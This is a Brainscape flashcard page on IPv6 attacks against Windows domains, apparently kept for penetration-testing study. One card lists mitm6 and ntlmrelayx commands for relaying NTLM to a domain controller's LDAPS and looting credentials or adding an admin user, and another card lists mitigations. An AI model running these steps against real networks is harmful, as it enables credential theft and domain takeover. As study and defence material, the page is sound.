Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

Attacks on Windows > IPv6 attacks > Flashcards

IPv6 attacks Flashcards

1
Q

MITM6 (dispo sur github, use pip2) LDAP Replay attacks

A
  1. mitm6 -d Domain
  2. ntlmrelayx.py -6 -t ldaps://IP_of_DC -wh fakewpad.marvel.local -l lootme
    (use information from previous cmd)
  3. Firefox group_ad.html (from mitm6)
  4. Check description for password
  5. aclpwn_200234109 => fichier de sauvegarde avant modification (i.e ajout d’utilisateur admin)
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Delegation attacks

A

https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Mitigation IPv6 attacks

A
  1. Windows try to use ipv6 even in ipv4 env. Block the dhcpv6 traffric in windows firewall via GP
  2. If WPAD is not in use internally disable it via Group Policy and by disabling the WinHttpAutoProxySvc service
  3. Enable LDAP signing and LDAP channel binding
  4. Make Admin user no delegable
How well did you know this?
1
Not at all
2
3
4
5
Perfectly

Attacks on Windows (11 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions